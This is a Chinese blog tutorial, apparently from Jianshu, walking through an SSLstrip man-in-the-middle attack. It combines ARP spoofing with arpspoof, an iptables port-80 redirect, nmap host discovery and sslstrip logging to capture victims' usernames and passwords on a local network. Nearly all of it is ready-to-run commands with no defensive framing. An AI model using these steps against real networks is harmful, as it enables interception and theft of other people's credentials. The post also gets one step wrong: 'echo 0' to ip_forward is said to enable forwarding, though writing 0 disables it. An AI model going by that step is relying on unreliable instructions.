利用parrot进行SSLstrip

介绍

我们的目标是尝试访问使用 https 网站的用户. 路由器(网关)会把受害者的访问请求发送给我们,而攻击者会把 https 转换成 http 协议,然后扣下报文中的 用户名和 密码. 攻击者会把请求报文发回给路由器(网关). 然后路由器会把这个新的请求发送给网站,这就是大概的攻击机制.

具体步骤

首先我们需要打开终端,输入 ifconfig 来查看我们的网卡
ifconfig

O1D$7S619@7NGM9F(J(%WXX.png

eth0代表有线网卡,wlan0代表无线网卡.
接下来我们需要输入一条命令
echo 0 > /proc/sys/net/ipv4/ip_forward
开启流量转发功能
接下来配置路由表(iptables),把80端口的数据传送到8080端口,也就是SSL欺骗需要监听的端口
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
现在我们需要找到网关的IP地址,输入 route -n, GateWay 显示的就是网关地址了
route -n
5SLRY~6L_{ERQGT73HK4Y%X.png

现在使用nmap获取目标主机的地址,在终端输入
nmap -sP [网关地址]/24
2SQ$TSQL36{M%$CURH6U}05.png

可以看到目标机的ip为:192.168.75.130
接下来我们进行欺骗
arpspoof -i [网卡] -t [目标ip] [网关ip]
arpspoof -i eth0 -t 192.168.75.130 192.168.75.2
然后新开一个终端开始监听
sslstrip -l 8080
打开终端,输入cat sslstrip.log
QQ截图20171021163203.png
QQ截图20171021163203.png

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 简单说说利用parrot进行SSLstrip 0x00前记 今天看了个视频,学习到了如何进行 SSLstrip.我...
    吐那个兔弘阅读 2,751评论 1 4
  • 个人认为,Goodboy1881先生的TCP /IP 协议详解学习博客系列博客是一部非常精彩的学习笔记,这虽然只是...
    贰零壹柒_fc10阅读 5,115评论 0 8
  • 1.这篇文章不是本人原创的,只是个人为了对这部分知识做一个整理和系统的输出而编辑成的,在此郑重地向本文所引用文章的...
    SOMCENT阅读 13,171评论 6 174
  • 9.1 引言 选路是IP最重要的功能之一。图9-1是IP层处理过程的简单流程。需要进行选路的数据报可以由本地主机产...
    张芳涛阅读 1,217评论 0 2
  • 夏日午后,躺在椅子上,听着chan chan,手跟着他的节奏摆动着…… 记得,第一次听到它时,也是在夏天,太...
    IANBI阅读 318评论 0 0